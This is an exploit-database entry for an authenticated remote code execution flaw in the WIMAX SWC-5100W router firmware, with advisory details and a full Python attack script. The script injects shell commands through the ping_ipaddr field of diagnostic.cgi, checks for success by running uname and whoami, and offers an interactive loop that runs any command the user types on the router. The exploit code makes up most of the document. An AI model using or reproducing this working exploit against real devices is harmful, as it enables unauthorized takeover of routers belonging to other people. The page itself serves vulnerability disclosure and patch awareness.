WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE

vendor:

SWC-5100W

by:

Momen Eldawakhly

7.5

CVSS

HIGH

Ballin' Mada

CWE

Product Name: SWC-5100W

Affected Version From: Bootloader(1.18.19.0), HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)

Affected Version To: Bootloader(1.18.19.0), HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)

Patch Exists: YES

Related CWE: Under registration

CPE: h:seowonintech:swc-5100w

Metasploit:

Other Scripts:

Platforms Tested: Unix

2023

WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) – Authenticated RCE

A vulnerability in the WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) allows an authenticated user to execute arbitrary code on the device. The vulnerability exists due to insufficient input validation in the cgi-bin/diagnostic.cgi script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable device. Successful exploitation of this vulnerability could lead to remote code execution.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version of the firmware.

Source

Exploit-DB raw data:

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration

import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup

red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET

argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')

args = argParser.parse_args()
target = args.target
rev = args.reverseShell
testX = args.testExploit


banner = """
 ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ 
||B |||a |||l |||l |||i |||n |||' |||       |||M |||a |||d |||a ||
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|
                    RCE 0day in WIMAX SWC-5100W
                 [ Spell the CGI as in Cyber Guy ]
"""
def checkEXP():
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)
    if request.status_code == 200:
        print(green + "[+] Status code: 200 success" + reset)
        soup = BeautifulSoup(request.text, 'html.parser') 
        if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):
            print(green + "[+] Target is vulnerable" + reset)
            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")
            soup_validate = BeautifulSoup(uname.text, 'html.parser')
            print(soup_validate.find(id="pwned").text)
        else:
            print(red + "[+] Seems to be not vulnerable" + reset)
    else:
        print(red + "[+] Status code: " + str(request.status_code) + reset)


def revShell():
    cmd = input("CGI #:- ")
    while cmd:
        try:
            print(cmd)
            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")
            resp = BeautifulSoup(uname.text, 'html.parser')
            print(resp.find(id="result").text)
            if cmd == "exit" or cmd == "quit":
                print(yellow + "[*] Terminating ..." + reset)
                sys.exit(0)
            else:
                return revShell()
        except KeyboardInterrupt:
            sys.exit(0)

def help():
    print(
    """ 
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv

[*] -t, --target :: Specify target to attack.
[*] -rv, --reverseShell :: Obtain reverse shell.
[*] -tx, --testExploit :: Test the exploitability of the target.
[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.
    """
    )
    
if target and rev:
    print(banner)
    revShell()
elif target and testX:
    print(banner)
    checkEXP()
else:
    print(banner)
    argParser.print_help()